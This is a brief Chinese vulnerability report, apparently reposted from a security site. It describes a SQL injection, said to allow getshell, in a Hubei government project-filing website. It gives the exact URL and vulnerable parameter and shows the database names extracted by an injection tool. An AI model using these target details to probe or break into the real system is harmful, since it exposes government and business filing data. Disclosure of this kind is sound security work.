湖北企业投资项目备案系统SQL注入可getshell下载

黑吧安全网

湖北企业投资项目备案系统SQL注入可getshell，包括湖北省企业投资的备案信息，影响较严重，不法分子可通过此漏洞获取到项目备案信息。

http://www.hbinvest.gov.cn/prws/index2.aspx?area_code=420600&str= area_code=420600 存在sql注入漏洞

available databases [12]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] PRS_Common

[*] prws

[*] pubs

[*] RightDB

[*] RPL

[*] tempdb

[*] test

[*] WorkFlow

修复方案：

过滤

上一篇：迅雷会员账号分享 7月3日下载

下一篇： [公开漏洞]顺丰速运网站查询签收图可导致用户隐私泄露

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

湖北企业投资项目备案系统SQL注入可getshell下载

修复方案：

推荐文章

推荐网站